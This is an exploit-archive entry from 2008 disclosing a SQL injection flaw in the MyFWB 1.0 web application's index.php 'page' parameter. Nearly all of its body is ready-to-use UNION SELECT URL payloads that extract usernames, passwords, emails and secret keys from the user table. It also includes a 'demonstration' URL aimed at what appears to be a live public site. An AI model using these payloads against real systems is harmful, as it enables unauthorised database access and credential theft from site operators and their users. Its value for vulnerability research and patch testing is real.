MyFWB 1.0 (index.php page) Remote SQL Injection Vulnerability

2008-09-20T00:00:00
ID 1337DAY-ID-3698
Type zdt
Reporter 0x90
Modified 2008-09-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
MyFWB 1.0 (index.php page) Remote SQL Injection Vulnerability
=============================================================



MyFWB 1.0 Remote SQL Injection

Author: 0x90
Product: MyFWB
download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
Version: 1.0
URL: http://www.fsoft.co.nr/
Vulnerability Class: SQL Injection


Username:
http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user

Password:
http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user

Email:
http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user

Secret Key:
http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user




Online Demostration:

http://myfwb.co.cc/?page=-0x90+union+select+0,0,secret,0+from+user




#  0day.today [2018-03-12]  #